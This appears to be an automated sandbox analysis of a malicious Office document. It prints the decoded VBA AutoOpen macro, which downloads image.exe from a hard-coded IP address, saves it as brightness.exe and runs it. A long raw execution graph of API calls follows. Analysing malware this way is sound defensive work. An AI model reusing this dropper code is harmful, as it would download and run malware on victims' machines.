                                                                                                                                          CreateObject("MSXML2.ServerXMLHTTP")

                                                                                                                                          CreateObject

                                                                                                                                          CreateObject("Adodb.Stream")

                                                                                                                                          Open

                                                                                                                                          IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/image.exe",False)

                                                                                                                                          Send

                                                                                                                                          responsebody

                                                                                                                                          IServerXMLHTTPRequest2.responsebody()

                                                                                                                                          Shell

                                                                                                                                          Shell(""brightness.exe"") -> 5560
                                                                                                                                          StringsDecrypted Strings
                                                                                                                                          "M""S""X""M""L""2"".""S""er""ver""XM""LH""TTP"
                                                                                                                                          "Ad""od""b.S""tr""ea""m"
                                                                                                                                          "h"
                                                                                                                                          "t"
                                                                                                                                          "t""p:/""/147.124.216.113/image"
                                                                                                                                          "."
                                                                                                                                          "e"
                                                                                                                                          "x"
                                                                                                                                          "e"
                                                                                                                                          "GET"
                                                                                                                                          "brightness"
                                                                                                                                          "."
                                                                                                                                          "e"
                                                                                                                                          "x"
                                                                                                                                          "e"
                                                                                                                                          """brightness"
                                                                                                                                          "."
                                                                                                                                          "e"
                                                                                                                                          "x"
                                                                                                                                          "e"""
                                                                                                                                          Line    Instruction    Meta Information
                                                                                                                                          9

                                                                                                                                          Sub AutoOpen()

                                                                                                                                          11

                                                                                                                                          Dim xHttp

                                                                                                                                          executed
                                                                                                                                          16

                                                                                                                                          Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")

                                                                                                                                          CreateObject("MSXML2.ServerXMLHTTP")

                                                                                                                                          executed
                                                                                                                                          18

                                                                                                                                          Dim bStrm

                                                                                                                                          20

                                                                                                                                          Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")

                                                                                                                                          CreateObject("Adodb.Stream")

                                                                                                                                          executed
                                                                                                                                          24

                                                                                                                                          Dim nirm1

                                                                                                                                          25

                                                                                                                                          nirm1 = "h"

                                                                                                                                          26

                                                                                                                                          Dim nirm2

                                                                                                                                          27

                                                                                                                                          nirm2 = "t"

                                                                                                                                          28

                                                                                                                                          Dim nirm3

                                                                                                                                          29

                                                                                                                                          nirm3 = "t" & "p:/" & "/147.124.216.113/image"

                                                                                                                                          30

                                                                                                                                          Dim nirm4

                                                                                                                                          31

                                                                                                                                          nirm4 = "."

                                                                                                                                          32

                                                                                                                                          Dim nirm5

                                                                                                                                          33

                                                                                                                                          nirm5 = "e"

                                                                                                                                          34

                                                                                                                                          Dim nirm6

                                                                                                                                          35

                                                                                                                                          nirm6 = "x"

                                                                                                                                          36

                                                                                                                                          Dim nirm7

                                                                                                                                          37

                                                                                                                                          nirm7 = "e"

                                                                                                                                          41

                                                                                                                                          Dim plpl

                                                                                                                                          42

                                                                                                                                          plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

                                                                                                                                          45

                                                                                                                                          xHttp.Open "GET", plpl, False

                                                                                                                                          IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/image.exe",False)

                                                                                                                                          executed
                                                                                                                                          46

                                                                                                                                          xHttp.Send

                                                                                                                                          Send

                                                                                                                                          52

                                                                                                                                          With bStrm

                                                                                                                                          53

                                                                                                                                          . Type = 1

                                                                                                                                          54

                                                                                                                                          . Open

                                                                                                                                          55

                                                                                                                                          . write xHttp.responsebody

                                                                                                                                          IServerXMLHTTPRequest2.responsebody()

                                                                                                                                          executed
                                                                                                                                          59

                                                                                                                                          Dim monu1

                                                                                                                                          60

                                                                                                                                          monu1 = "brightness"

                                                                                                                                          61

                                                                                                                                          Dim monu2

                                                                                                                                          62

                                                                                                                                          monu2 = "."

                                                                                                                                          64

                                                                                                                                          Dim monu3

                                                                                                                                          65

                                                                                                                                          monu3 = "e"

                                                                                                                                          67

                                                                                                                                          Dim monu4

                                                                                                                                          68

                                                                                                                                          monu4 = "x"

                                                                                                                                          70

                                                                                                                                          Dim monu5

                                                                                                                                          71

                                                                                                                                          monu5 = "e"

                                                                                                                                          73

                                                                                                                                          Dim monu6

                                                                                                                                          74

                                                                                                                                          monu6 = monu1 & monu2 & monu3 & monu4 & monu5

                                                                                                                                          77

                                                                                                                                          . savetofile monu6, 2

                                                                                                                                          80

                                                                                                                                          Dim parveen1

                                                                                                                                          81

                                                                                                                                          Dim parveen2

                                                                                                                                          82

                                                                                                                                          Dim parveen3

                                                                                                                                          83

                                                                                                                                          Dim parveen4

                                                                                                                                          84

                                                                                                                                          Dim praveen1

                                                                                                                                          85

                                                                                                                                          praveen1 = """brightness"

                                                                                                                                          86

                                                                                                                                          Dim praveen2

                                                                                                                                          87

                                                                                                                                          praveen2 = "."

                                                                                                                                          89

                                                                                                                                          Dim praveen3

                                                                                                                                          90

                                                                                                                                          praveen3 = "e"

                                                                                                                                          92

                                                                                                                                          Dim praveen4

                                                                                                                                          93

                                                                                                                                          praveen4 = "x"

                                                                                                                                          95

                                                                                                                                          Dim praveen5

                                                                                                                                          96

                                                                                                                                          praveen5 = "e"""

                                                                                                                                          101

                                                                                                                                          Dim praveen6

                                                                                                                                          102

                                                                                                                                          praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5

                                                                                                                                          106

                                                                                                                                          End With

                                                                                                                                          108

                                                                                                                                          Shell (praveen6)

                                                                                                                                          Shell(""brightness.exe"") -> 5560

                                                                                                                                          executed
                                                                                                                                          110

                                                                                                                                          End Sub

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:15.1%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:30.4%
                                                                                                                                            Total number of Nodes:1623
                                                                                                                                            Total number of Limit Nodes:15
27b64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 29090->29094 29093 27b2d3a 29093->29081 29094->29089 29095->29093 29097 27b2c3a 29096->29097 29099 27b2c30 29096->29099 29097->29083 29098 27b2d19 29104 27b2ce8 7 API calls 29098->29104 29099->29097 29099->29098 29103 27b64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 29099->29103 29102 27b2d3a 29102->29083 29103->29098 29104->29102 29106 27b4500 11 API calls 29105->29106 29107 27c803b 29106->29107 29108 27c790c 12 API calls 29107->29108 29109 27c8048 29108->29109 29110 27c8050 GetModuleHandleA 29109->29110 29111 27c80c0 15 API calls 29110->29111 29112 27c8061 GetModuleHandleA 29111->29112 29113 27c807f 29112->29113 29114 27b44ac 11 API calls 29113->29114 29115 27c7d4d 29114->29115 29115->29036 29116 27d6bf8 29117 27b480c 11 API calls 29116->29117 29118 27d6c19 29117->29118 29119 27b4798 11 API calls 29118->29119 29120 27d6c50 29119->29120 29933 27c881c 29120->29933 29123 27b480c 11 API calls 29124 27d6c95 29123->29124 29125 27b4798 11 API calls 29124->29125 29126 27d6ccc 29125->29126 29127 27c881c 22 API calls 29126->29127 29128 27d6cf0 29127->29128 29129 27b480c 11 API calls 29128->29129 29130 27d6d11 29129->29130 29131 27b4798 11 API calls 29130->29131 29132 27d6d48 29131->29132 29133 27c881c 22 API calls 29132->29133 29134 27d6d6c 29133->29134 29135 27b480c 11 API calls 29134->29135 29136 27d6d8d 29135->29136 29137 27b4798 11 API calls 29136->29137 29138 27d6dc4 29137->29138 29139 27c881c 22 API calls 29138->29139 29140 27d6de8 29139->29140 29141 27b480c 11 API calls 29140->29141 29142 27d6e09 29141->29142 29143 27b4798 11 API calls 29142->29143 29144 27d6e40 29143->29144 29145 27c881c 22 API calls 29144->29145 29146 27d6e64 29145->29146 29147 27b480c 11 API calls 29146->29147 29148 27d6e9e 29147->29148 29946 27ce36c 29148->29946 29150 27d6ecd 29956 27ceaf4 29150->29956 29153 27b480c 11 API calls 29154 27d6f1d 29153->29154 29155 27b4798 11 API calls 29154->29155 29156 27d6f54 29155->29156 29157 27c881c 
22 API calls 29156->29157 29158 27d6f78 29157->29158 29159 27b480c 11 API calls 29158->29159 29160 27d6f99 29159->29160 29161 27b4798 11 API calls 29160->29161 29162 27d6fd0 29161->29162 29163 27c881c 22 API calls 29162->29163 29164 27d6ff4 29163->29164 29165 27b480c 11 API calls 29164->29165 29166 27d7015 29165->29166 29167 27b4798 11 API calls 29166->29167 29168 27d704c 29167->29168 29169 27c881c 22 API calls 29168->29169 29170 27d7070 29169->29170 29171 27b480c 11 API calls 29170->29171 29172 27d7091 29171->29172 29173 27b4798 11 API calls 29172->29173 29174 27d70c8 29173->29174 29175 27d70ec 29174->29175 29176 27c881c 22 API calls 29174->29176 29177 27b480c 11 API calls 29175->29177 29176->29175 29178 27d710d 29177->29178 29179 27b4798 11 API calls 29178->29179 29180 27d7144 29179->29180 29181 27c881c 22 API calls 29180->29181 29182 27d7168 29181->29182 29183 27b480c 11 API calls 29182->29183 29184 27d7189 29183->29184 29185 27b4798 11 API calls 29184->29185 29186 27d71c0 29185->29186 29187 27c881c 22 API calls 29186->29187 29188 27d71e4 29187->29188 29189 27b480c 11 API calls 29188->29189 29190 27d7205 29189->29190 29191 27b4798 11 API calls 29190->29191 29192 27d723c 29191->29192 29193 27c881c 22 API calls 29192->29193 29194 27d7260 29193->29194 29195 27b480c 11 API calls 29194->29195 29196 27d7281 29195->29196 29197 27b4798 11 API calls 29196->29197 29198 27d72b8 29197->29198 29199 27c881c 22 API calls 29198->29199 29200 27d72dc 29199->29200 29201 27b480c 11 API calls 29200->29201 29202 27d72fd 29201->29202 29203 27b4798 11 API calls 29202->29203 29204 27d7334 29203->29204 29205 27c881c 22 API calls 29204->29205 29206 27d7358 29205->29206 29207 27d736d 29206->29207 29208 27d7e9c 29206->29208 29209 27b480c 11 API calls 29207->29209 29210 27b480c 11 API calls 29208->29210 29211 27d738e 29209->29211 29212 27d7ebd 29210->29212 29213 27b4798 11 API calls 29211->29213 29214 27b4798 11 API calls 29212->29214 29215 27d73c5 29213->29215 29216 27d7ef4 29214->29216 
29217 27c881c 22 API calls 29215->29217 29218 27c881c 22 API calls 29216->29218 29219 27d73e9 29217->29219 29220 27d7f18 29218->29220 29221 27b480c 11 API calls 29219->29221 29222 27b480c 11 API calls 29220->29222 29223 27d740a 29221->29223 29224 27d7f39 29222->29224 29225 27b4798 11 API calls 29223->29225 29226 27b4798 11 API calls 29224->29226 29227 27d7441 29225->29227 29228 27d7f70 29226->29228 29229 27c881c 22 API calls 29227->29229 29230 27c881c 22 API calls 29228->29230 29231 27d7465 29229->29231 29232 27d7f94 29230->29232 29233 27b480c 11 API calls 29231->29233 29234 27b480c 11 API calls 29232->29234 29235 27d7486 29233->29235 29236 27d7fb5 29234->29236 29237 27b4798 11 API calls 29235->29237 29238 27b4798 11 API calls 29236->29238 29239 27d74bd 29237->29239 29240 27d7fec 29238->29240 29241 27c881c 22 API calls 29239->29241 29242 27c881c 22 API calls 29240->29242 29243 27d74e1 29241->29243 29244 27d8010 29242->29244 29245 27b4798 11 API calls 29243->29245 29246 27b480c 11 API calls 29244->29246 29247 27d74f9 29245->29247 29249 27d8031 29246->29249 30413 27c8408 29247->30413 29252 27b4798 11 API calls 29249->29252 29250 27d750a 29251 27b480c 11 API calls 29250->29251 29253 27d752b 29251->29253 29254 27d8068 29252->29254 29255 27b4798 11 API calls 29253->29255 29256 27c881c 22 API calls 29254->29256 29258 27d7562 29255->29258 29257 27d808c 29256->29257 29259 27d8f25 29257->29259 29260 27d80a1 29257->29260 29263 27c881c 22 API calls 29258->29263 29261 27b480c 11 API calls 29259->29261 29262 27b480c 11 API calls 29260->29262 29267 27d8f46 29261->29267 29264 27d80c2 29262->29264 29265 27d7586 29263->29265 29268 27d80da 29264->29268 29266 27b480c 11 API calls 29265->29266 29271 27d75a7 29266->29271 29269 27b4798 11 API calls 29267->29269 29270 27b4798 11 API calls 29268->29270 29275 27d8f7d 29269->29275 29272 27d80f9 29270->29272 29273 27b4798 11 API calls 29271->29273 29274 27d8111 29272->29274 29279 27d75de 29273->29279 29277 27c881c 22 API calls 29274->29277 
29276 27c881c 22 API calls 29275->29276 29278 27d8fa1 29276->29278 29280 27d811d 29277->29280 29281 27b480c 11 API calls 29278->29281 29283 27c881c 22 API calls 29279->29283 29282 27b480c 11 API calls 29280->29282 29287 27d8fc2 29281->29287 29284 27d813e 29282->29284 29285 27d7602 29283->29285 29288 27d8149 29284->29288 29286 27b480c 11 API calls 29285->29286 29291 27d7623 29286->29291 29289 27b4798 11 API calls 29287->29289 29290 27b4798 11 API calls 29288->29290 29294 27d8ff9 29289->29294 29292 27d8175 29290->29292 29293 27b4798 11 API calls 29291->29293 29295 27d8180 29292->29295 29298 27d765a 29293->29298 29297 27c881c 22 API calls 29294->29297 29296 27c881c 22 API calls 29295->29296 29299 27d8199 29296->29299 29300 27d901d 29297->29300 29303 27c881c 22 API calls 29298->29303 29302 27b480c 11 API calls 29299->29302 29301 27b480c 11 API calls 29300->29301 29304 27d903e 29301->29304 29305 27d81ba 29302->29305 29306 27d767e 29303->29306 29307 27b4798 11 API calls 29304->29307 29308 27b4798 11 API calls 29305->29308 30425 27cac30 29 API calls 29306->30425 29312 27d9075 29307->29312 29313 27d81f1 29308->29313 29310 27d76a5 29311 27b480c 11 API calls 29310->29311 29316 27d76c6 29311->29316 29315 27c881c 22 API calls 29312->29315 29314 27c881c 22 API calls 29313->29314 29317 27d8215 29314->29317 29324 27d9099 29315->29324 29319 27b4798 11 API calls 29316->29319 29318 27b4798 11 API calls 29317->29318 29320 27d8241 29318->29320 29325 27d76fd 29319->29325 29323 27d8259 29320->29323 29321 27d9854 29322 27b480c 11 API calls 29321->29322 29327 27d9875 29322->29327 29329 27d8264 CreateProcessAsUserW 29323->29329 29324->29321 29326 27b480c 11 API calls 29324->29326 29328 27c881c 22 API calls 29325->29328 29337 27d90e4 29326->29337 29333 27b4798 11 API calls 29327->29333 29330 27d7721 29328->29330 29331 27d8276 29329->29331 29332 27d82f2 29329->29332 29335 27b480c 11 API calls 29330->29335 29336 27b480c 11 API calls 29331->29336 29334 27b480c 11 API calls 29332->29334 29341 
27d98ac 29333->29341 29342 27d8313 29334->29342 29343 27d7742 29335->29343 29338 27d8297 29336->29338 29339 27b4798 11 API calls 29337->29339 29340 27d82a2 29338->29340 29350 27d911b 29339->29350 29345 27b4798 11 API calls 29340->29345 29346 27c881c 22 API calls 29341->29346 29347 27b4798 11 API calls 29342->29347 29344 27b4798 11 API calls 29343->29344 29356 27d7779 29344->29356 29348 27d82ce 29345->29348 29349 27d98d0 29346->29349 29355 27d834a 29347->29355 29353 27d82d9 29348->29353 29351 27b480c 11 API calls 29349->29351 29352 27c881c 22 API calls 29350->29352 29358 27d98f1 29351->29358 29354 27d913f 29352->29354 29362 27c881c 22 API calls 29353->29362 29357 27b480c 11 API calls 29354->29357 29360 27c881c 22 API calls 29355->29360 29361 27c881c 22 API calls 29356->29361 29359 27d9160 29357->29359 29365 27b4798 11 API calls 29358->29365 29368 27b4798 11 API calls 29359->29368 29363 27d836e 29360->29363 29364 27d779d 29361->29364 29362->29332 29366 27b480c 11 API calls 29363->29366 29367 27b480c 11 API calls 29364->29367 29370 27d9928 29365->29370 29371 27d838f 29366->29371 29369 27d77be 29367->29369 29376 27d9197 29368->29376 29374 27b4798 11 API calls 29369->29374 29372 27c881c 22 API calls 29370->29372 29373 27b4798 11 API calls 29371->29373 29375 27d994c 29372->29375 29379 27d83c6 29373->29379 29380 27d77f5 29374->29380 29377 27b480c 11 API calls 29375->29377 29378 27c881c 22 API calls 29376->29378 29385 27d996d 29377->29385 29381 27d91bb 29378->29381 29383 27c881c 22 API calls 29379->29383 29384 27c881c 22 API calls 29380->29384 29382 27b480c 11 API calls 29381->29382 29389 27d91dc 29382->29389 29386 27d83ea 29383->29386 29387 27d7819 29384->29387 29388 27b4798 11 API calls 29385->29388 29390 27b49a4 11 API calls 29386->29390 29392 27b480c 11 API calls 29387->29392 29394 27d99a4 29388->29394 29393 27b4798 11 API calls 29389->29393 29391 27d840e 29390->29391 29395 27b480c 11 API calls 29391->29395 29398 27d7859 29392->29398 29399 27d9213 29393->29399 29396 
27c881c 22 API calls 29394->29396 29397 27d843d 29395->29397 29403 27d99c8 29396->29403 29402 27d8448 29397->29402 29400 27b4798 11 API calls 29398->29400 29401 27c881c 22 API calls 29399->29401 29408 27d7890 29400->29408 29404 27d9237 29401->29404 29405 27b4798 11 API calls 29402->29405 29409 27c881c 22 API calls 29403->29409 29968 27ce974 29404->29968 29407 27d8474 29405->29407 29415 27d847f 29407->29415 29412 27c881c 22 API calls 29408->29412 29414 27d99fb 29409->29414 29411 27b480c 11 API calls 29417 27d927b 29411->29417 29413 27d78b4 29412->29413 29416 27b480c 11 API calls 29413->29416 29419 27c881c 22 API calls 29414->29419 29418 27c881c 22 API calls 29415->29418 29423 27d78d5 29416->29423 29421 27b480c 11 API calls 29417->29421 29420 27d8498 29418->29420 29424 27d9a2e 29419->29424 29422 27b480c 11 API calls 29420->29422 29426 27d92b3 29421->29426 29427 27d84b9 29422->29427 29425 27b4798 11 API calls 29423->29425 29428 27c881c 22 API calls 29424->29428 29431 27d790c 29425->29431 29429 27b4798 11 API calls 29426->29429 29430 27b4798 11 API calls 29427->29430 29433 27d9a61 29428->29433 29434 27d92ea 29429->29434 29435 27d84f0 29430->29435 29432 27c881c 22 API calls 29431->29432 29436 27d7930 29432->29436 29438 27c881c 22 API calls 29433->29438 29440 27c881c 22 API calls 29434->29440 29441 27c881c 22 API calls 29435->29441 29437 27b480c 11 API calls 29436->29437 29447 27d7951 29437->29447 29439 27d9a94 29438->29439 29442 27b480c 11 API calls 29439->29442 29443 27d930e 29440->29443 29444 27d8514 29441->29444 29448 27d9ab5 29442->29448 29445 27b480c 11 API calls 29443->29445 29446 27b480c 11 API calls 29444->29446 29450 27d932f 29445->29450 29451 27d8535 29446->29451 29449 27b4798 11 API calls 29447->29449 29452 27b4798 11 API calls 29448->29452 29455 27d7988 29449->29455 29453 27b4798 11 API calls 29450->29453 29454 27b4798 11 API calls 29451->29454 29457 27d9aec 29452->29457 29460 27d9366 29453->29460 29458 27d856c 29454->29458 29456 27c881c 22 API calls 
29455->29456 29459 27d79ac 29456->29459 29462 27c881c 22 API calls 29457->29462 29464 27c881c 22 API calls 29458->29464 30426 27c5a6c 42 API calls 29459->30426 29463 27c881c 22 API calls 29460->29463 29466 27d9b10 29462->29466 29467 27d938a 29463->29467 29468 27d8590 29464->29468 29470 27b480c 11 API calls 29466->29470 29975 27b7e10 29467->29975 30429 27ccf9c 25 API calls 29468->30429 29469 27d79d8 29477 27b4b78 11 API calls 29469->29477 29478 27d9b31 29470->29478 29474 27d85a4 29476 27b480c 11 API calls 29474->29476 29475 27d964e 29479 27b480c 11 API calls 29475->29479 29484 27d85ca 29476->29484 29481 27d79ed 29477->29481 29483 27b4798 11 API calls 29478->29483 29485 27d966f 29479->29485 29480 27b480c 11 API calls 29486 27d93bd 29480->29486 29482 27b480c 11 API calls 29481->29482 29488 27d7a0e 29482->29488 29489 27d9b68 29483->29489 29487 27b4798 11 API calls 29484->29487 29490 27b4798 11 API calls 29485->29490 29491 27b4798 11 API calls 29486->29491 29494 27d8601 29487->29494 29492 27b4798 11 API calls 29488->29492 29493 27c881c 22 API calls 29489->29493 29497 27d96a6 29490->29497 29498 27d93f4 29491->29498 29500 27d7a45 29492->29500 29495 27d9b8c 29493->29495 29499 27c881c 22 API calls 29494->29499 29496 27b480c 11 API calls 29495->29496 29508 27d9bad 29496->29508 29503 27c881c 22 API calls 29497->29503 29501 27c881c 22 API calls 29498->29501 29502 27d8625 29499->29502 29507 27c881c 22 API calls 29500->29507 29505 27d9418 29501->29505 29506 27b480c 11 API calls 29502->29506 29504 27d96ca 29503->29504 29509 27b480c 11 API calls 29504->29509 29510 27b480c 11 API calls 29505->29510 29513 27d8646 29506->29513 29511 27d7a69 29507->29511 29512 27b4798 11 API calls 29508->29512 29515 27d96eb 29509->29515 29516 27d9439 29510->29516 29514 27b49a4 11 API calls 29511->29514 29520 27d9be4 29512->29520 29518 27b4798 11 API calls 29513->29518 29517 27d7a86 29514->29517 29521 27b4798 11 API calls 29515->29521 29522 27b4798 11 API calls 29516->29522 30427 27c7dd0 17 API calls 
29517->30427 29526 27d867d 29518->29526 29525 27c881c 22 API calls 29520->29525 29527 27d9722 29521->29527 29528 27d9470 29522->29528 29523 27d7a8c 29524 27b480c 11 API calls 29523->29524 29530 27d7aad 29524->29530 29532 27d9c08 29525->29532 29529 27c881c 22 API calls 29526->29529 29533 27c881c 22 API calls 29527->29533 29534 27c881c 22 API calls 29528->29534 29531 27d86a1 29529->29531 29537 27b4798 11 API calls 29530->29537 29536 27b480c 11 API calls 29531->29536 29540 27c881c 22 API calls 29532->29540 29538 27d9746 29533->29538 29535 27d9494 29534->29535 29539 27b480c 11 API calls 29535->29539 29542 27d86c2 29536->29542 29543 27d7ae4 29537->29543 29541 27b480c 11 API calls 29538->29541 29546 27d94b5 29539->29546 29544 27d9c3b 29540->29544 29545 27d9767 29541->29545 29547 27b4798 11 API calls 29542->29547 29548 27c881c 22 API calls 29543->29548 29549 27c881c 22 API calls 29544->29549 29550 27b4798 11 API calls 29545->29550 29551 27b4798 11 API calls 29546->29551 29554 27d86f9 29547->29554 29552 27d7b08 29548->29552 29555 27d9c6e 29549->29555 29556 27d979e 29550->29556 29557 27d94ec 29551->29557 29553 27b480c 11 API calls 29552->29553 29558 27d7b29 29553->29558 29559 27c881c 22 API calls 29554->29559 29561 27c881c 22 API calls 29555->29561 29562 27c881c 22 API calls 29556->29562 29563 27c881c 22 API calls 29557->29563 29566 27b4798 11 API calls 29558->29566 29560 27d871d 29559->29560 29564 27d873d 29560->29564 29565 27d8726 29560->29565 29573 27d9ca1 29561->29573 29567 27d97c2 29562->29567 29568 27d9510 29563->29568 29570 27b480c 11 API calls 29564->29570 30430 27c857c 17 API calls 29565->30430 29574 27d7b60 29566->29574 29571 27b480c 11 API calls 29567->29571 29572 27b480c 11 API calls 29568->29572 29578 27d875e 29570->29578 29576 27d97e3 29571->29576 29577 27d9531 29572->29577 29575 27c881c 22 API calls 29573->29575 29579 27c881c 22 API calls 29574->29579 29585 27d9cd4 29575->29585 29580 27b4798 11 API calls 29576->29580 29581 27b4798 11 API calls 29577->29581 
29582 27b4798 11 API calls 29578->29582 29583 27d7b84 29579->29583 29587 27d981a 29580->29587 29588 27d9568 29581->29588 29589 27d8795 29582->29589 29584 27b480c 11 API calls 29583->29584 29591 27d7ba5 29584->29591 29586 27c881c 22 API calls 29585->29586 29590 27d9d07 29586->29590 29594 27c881c 22 API calls 29587->29594 29595 27c881c 22 API calls 29588->29595 29592 27c881c 22 API calls 29589->29592 29593 27b480c 11 API calls 29590->29593 29597 27b4798 11 API calls 29591->29597 29596 27d87b9 29592->29596 29604 27d9d28 29593->29604 29598 27d983e 29594->29598 29599 27d958c 29595->29599 29600 27b480c 11 API calls 29596->29600 29606 27d7bdc 29597->29606 29994 27b49a4 29598->29994 29602 27b480c 11 API calls 29599->29602 29608 27d87da 29600->29608 29607 27d95ad 29602->29607 29609 27b4798 11 API calls 29604->29609 29610 27c881c 22 API calls 29606->29610 29611 27b4798 11 API calls 29607->29611 29612 27b4798 11 API calls 29608->29612 29615 27d9d5f 29609->29615 29613 27d7c00 29610->29613 29617 27d95e4 29611->29617 29618 27d8811 29612->29618 29614 27b480c 11 API calls 29613->29614 29620 27d7c21 29614->29620 29616 27c881c 22 API calls 29615->29616 29619 27d9d83 29616->29619 29622 27c881c 22 API calls 29617->29622 29623 27c881c 22 API calls 29618->29623 29621 27b480c 11 API calls 29619->29621 29625 27b4798 11 API calls 29620->29625 29627 27d9da4 29621->29627 29631 27d9608 29622->29631 29624 27d8835 29623->29624 29626 27b480c 11 API calls 29624->29626 29628 27d7c58 29625->29628 29629 27d8856 29626->29629 29630 27b4798 11 API calls 29627->29630 29632 27c881c 22 API calls 29628->29632 29634 27b4798 11 API calls 29629->29634 29637 27d9ddb 29630->29637 29979 27cdf00 29631->29979 29635 27d7c7c 29632->29635 29639 27d888d 29634->29639 30428 27caf50 41 API calls 29635->30428 29638 27c881c 22 API calls 29637->29638 29643 27d9dff 29638->29643 29641 27c881c 22 API calls 29639->29641 29640 27d7c8d 29642 27d88b1 ResumeThread 29641->29642 29644 27b480c 11 API calls 29642->29644 29645 27c881c 
22 API calls 29643->29645 29647 27d88dd 29644->29647 29646 27d9e32 29645->29646 29648 27b480c 11 API calls 29646->29648 29649 27b4798 11 API calls 29647->29649 29650 27d9e53 29648->29650 29652 27d8914 29649->29652 29651 27b4798 11 API calls 29650->29651 29655 27d9e8a 29651->29655 29653 27c881c 22 API calls 29652->29653 29654 27d8938 29653->29654 29656 27b480c 11 API calls 29654->29656 29657 27c881c 22 API calls 29655->29657 29659 27d8959 29656->29659 29658 27d9eae 29657->29658 29660 27b480c 11 API calls 29658->29660 29661 27b4798 11 API calls 29659->29661 29662 27d9ecf 29660->29662 29663 27d8990 29661->29663 29664 27b4798 11 API calls 29662->29664 29665 27c881c 22 API calls 29663->29665 29667 27d9f06 29664->29667 29666 27d89b4 29665->29666 29668 27b480c 11 API calls 29666->29668 29669 27c881c 22 API calls 29667->29669 29672 27d89d5 29668->29672 29670 27d9f2a 29669->29670 29671 27b480c 11 API calls 29670->29671 29674 27d9f4b 29671->29674 29673 27b4798 11 API calls 29672->29673 29675 27d8a0c 29673->29675 29676 27b4798 11 API calls 29674->29676 29677 27c881c 22 API calls 29675->29677 29679 27d9f82 29676->29679 29678 27d8a30 CloseHandle 29677->29678 29680 27b480c 11 API calls 29678->29680 29681 27c881c 22 API calls 29679->29681 29682 27d8a5c 29680->29682 29683 27d9fa6 29681->29683 29684 27b4798 11 API calls 29682->29684 29685 27c881c 22 API calls 29683->29685 29686 27d8a93 29684->29686 29688 27d9fd9 29685->29688 29687 27c881c 22 API calls 29686->29687 29689 27d8ab7 29687->29689 29691 27c881c 22 API calls 29688->29691 29690 27b480c 11 API calls 29689->29690 29693 27d8ad8 29690->29693 29692 27da00c 29691->29692 29694 27c881c 22 API calls 29692->29694 29695 27b4798 11 API calls 29693->29695 29697 27da03f 29694->29697 29696 27d8b0f 29695->29696 29698 27c881c 22 API calls 29696->29698 29699 27c881c 22 API calls 29697->29699 29700 27d8b33 29698->29700 29701 27da072 29699->29701 29702 27b480c 11 API calls 29700->29702 29703 27b480c 11 API calls 29701->29703 29705 27d8b54 
29702->29705 29704 27da093 29703->29704 29706 27b4798 11 API calls 29704->29706 29707 27b4798 11 API calls 29705->29707 29708 27da0ca 29706->29708 29709 27d8b8b 29707->29709 29711 27c881c 22 API calls 29708->29711 29710 27c881c 22 API calls 29709->29710 29712 27d8baf 29710->29712 29713 27da0ee 29711->29713 29714 27b480c 11 API calls 29712->29714 29715 27b480c 11 API calls 29713->29715 29716 27d8bd0 29714->29716 29717 27da10f 29715->29717 29719 27b4798 11 API calls 29716->29719 29718 27b4798 11 API calls 29717->29718 29720 27da146 29718->29720 29721 27d8c07 29719->29721 29722 27c881c 22 API calls 29720->29722 29723 27c881c 22 API calls 29721->29723 29726 27da16a 29722->29726 29724 27d8c2b 29723->29724 29725 27b480c 11 API calls 29724->29725 29727 27d8c4c 29725->29727 29728 27c881c 22 API calls 29726->29728 29729 27b4798 11 API calls 29727->29729 29730 27da19d 29728->29730 29732 27d8c83 29729->29732 29731 27c881c 22 API calls 29730->29731 29735 27da1d0 29731->29735 29733 27c881c 22 API calls 29732->29733 29734 27d8ca7 29733->29734 29736 27b480c 11 API calls 29734->29736 29737 27c881c 22 API calls 29735->29737 29738 27d8cc8 29736->29738 29740 27da203 29737->29740 29739 27b4798 11 API calls 29738->29739 29742 27d8cff 29739->29742 29741 27c881c 22 API calls 29740->29741 29743 27da236 29741->29743 29744 27c881c 22 API calls 29742->29744 29746 27c881c 22 API calls 29743->29746 29745 27d8d23 29744->29745 29747 27b480c 11 API calls 29745->29747 29748 27da269 29746->29748 29750 27d8d44 29747->29750 29749 27b480c 11 API calls 29748->29749 29752 27da28a 29749->29752 29751 27b4798 11 API calls 29750->29751 29754 27d8d7b 29751->29754 29753 27b4798 11 API calls 29752->29753 29755 27da2c1 29753->29755 29756 27c881c 22 API calls 29754->29756 29758 27c881c 22 API calls 29755->29758 29757 27d8d9f 29756->29757 30431 27c8798 LoadLibraryW 29757->30431 29759 27da2e5 29758->29759 29760 27b480c 11 API calls 29759->29760 29766 27da306 29760->29766 29763 27c8798 21 API calls 29764 27d8dd2 
